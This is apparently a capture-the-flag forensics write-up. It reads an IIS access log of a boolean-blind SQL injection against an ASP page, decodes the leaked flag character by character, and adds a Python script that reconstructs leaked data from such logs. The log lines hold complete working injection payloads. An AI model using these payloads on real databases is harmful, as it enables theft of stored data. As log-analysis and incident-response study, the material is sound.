2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0

Following the binary search one character position at a time yields the ASCII values of the 8 characters:

>>> chr(53)
'5'
>>> chr(50)
'2'
>>> chr(99)
'c'
>>> chr(53)
'5'
>>> chr(102)
'f'
>>> chr(49)
'1'
>>> chr(100)
'd'
>>> chr(54)
'6'
>>>

Concatenated, the flag is: 52c5f1d6
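
An added example, not part of the original write-up: the position-by-position binary-search reading described above, automated in Python for incident response on logs of this shape. It assumes, as in the log above, that status 200 means the probed comparison was true and 500 (the rows carrying the |18|800a0bcd| error) means it was false; the sample lines are constructed with a shortened query, and position 4 is left incomplete to show an unresolved character.

```python
"""Recover what a boolean-blind SQL injection leaked, from IIS access-log lines."""
import re
from collections import defaultdict

# Matches "),<position>,1))><threshold>" in the URL-decoded query string.
PROBE = re.compile(r"\),(\d+),1\)\)>(\d+)")


def sample_line(pos, threshold, status):
    """Build one constructed log line in the field layout of data.log."""
    error = "|18|800a0bcd|BOF_or_EOF" if status == 500 else ""
    return ("2015-10-21 09:32:35 W3SVC1 192.168.1.135 GET /show.asp "
            "id=2 AND UNICODE(SUBSTRING((SELECT MIN(theflag) FROM news),"
            f"{pos},1))>{threshold}{error} 80 - 192.168.1.101 Mozilla/5.0 {status} 0 0")


# Constructed probes: (position, threshold, HTTP status).
PROBES = [
    (1, 64, 500), (1, 32, 200), (1, 48, 200), (1, 56, 500),
    (1, 52, 200), (1, 54, 500), (1, 53, 500),
    (2, 64, 500), (2, 32, 200), (2, 48, 200), (2, 56, 500),
    (2, 52, 500), (2, 50, 500), (2, 49, 200),
    (3, 64, 200), (3, 96, 200), (3, 112, 500), (3, 104, 500),
    (3, 100, 500), (3, 98, 200), (3, 99, 500),
    (4, 64, 500), (4, 32, 200),          # search cut short: stays unresolved
]
SAMPLE = [sample_line(*p) for p in PROBES]


def recover(lines):
    """Map each probed position to its recovered character, or None if unresolved."""
    bounds = defaultdict(lambda: [0, 0x10FFFF])   # position -> [min, max] code point
    for line in lines:
        probe = PROBE.search(line)
        fields = line.split()
        if not probe or len(fields) < 3:
            continue                               # not an injection probe
        pos, threshold = int(probe.group(1)), int(probe.group(2))
        status = fields[-3]                        # sc-status, before the two trailing fields
        if status == "200":                        # comparison true: code point > threshold
            bounds[pos][0] = max(bounds[pos][0], threshold + 1)
        elif status == "500":                      # comparison false: code point <= threshold
            bounds[pos][1] = min(bounds[pos][1], threshold)
    return {pos: chr(lo) if lo == hi else None
            for pos, (lo, hi) in sorted(bounds.items())}


def leaked_text(lines):
    """Join the recovered characters, marking unresolved positions with '?'."""
    return "".join(ch or "?" for ch in recover(lines).values())


if __name__ == "__main__":
    print(recover(SAMPLE))
    print(leaked_text(SAMPLE))
```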

Fancy WAF bypass

Scanning the site finds www.zip, which contains the source code; the challenge tests SQL injection.